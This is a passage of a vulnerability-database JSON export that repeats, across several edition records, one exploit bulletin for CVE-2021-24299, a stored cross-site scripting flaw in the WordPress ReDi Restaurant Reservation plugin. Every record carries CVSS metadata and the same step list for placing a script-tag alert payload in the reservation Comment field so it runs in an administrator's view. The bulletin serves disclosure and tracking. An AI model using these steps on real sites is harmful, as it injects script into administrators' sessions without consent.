21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-13T22:26:45", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-11T22:44:06", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-11T22:44:06", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-14] #"}, "lastseen": "2021-09-13T22:26:45", "differentElements": ["sourceData"], "edition": 15}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "89197ec719858d58448c49932abb652b", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-14T22:27:07", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-11T22:44:06", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-11T22:44:06", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-15] #"}, "lastseen": "2021-09-14T22:27:07", "differentElements": ["sourceData"], "edition": 16}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "419c0cf668fdf042def6e9fec0cc8c7d", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-15T22:55:54", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-09-15T22:55:54", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-15T22:55:54", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-16] #"}, "lastseen": "2021-09-15T22:55:54", "differentElements": ["sourceData"], "edition": 17}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "b68628814a50a22fad057f547f771cda", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-16T22:59:51", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-16T22:59:51", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-16T22:59:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-17] #"}, "lastseen": "2021-09-16T22:59:51", "differentElements": ["sourceData"], "edition": 18}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "e4bb9954dcb8ce1ace3c3760e46bb22e", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-20T20:51:24", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-16T22:59:51", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-16T22:59:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-20] #"}, "lastseen": "2021-09-20T20:51:24", "differentElements": ["sourceData"], "edition": 19}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "03d075366e4f1d99fddbd88ef505f906", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-21T00:45:56", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-21T00:45:56", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-21T00:45:56", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-21] #"}, "lastseen": "2021-09-21T00:45:56", "differentElements": ["sourceData"], "edition": 20}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "49f929af799dcbb2b1ab1328aa99d335", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-22T06:49:17", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-22T06:49:17", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-22T06:49:17", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-22] #"}, "lastseen": "2021-09-22T06:49:17", "differentElements": ["sourceData"], "edition": 21}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "08a4a93b0a2456228f16751ee7089a8c", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-22T22:24:58", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-22T22:24:58", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-22T22:24:58", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-23] #"}, "lastseen": "2021-09-22T22:24:58", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "a30c4707f24c241257bf833db841a002", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-23T22:37:55", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-23T22:37:55", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-23T22:37:55", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: 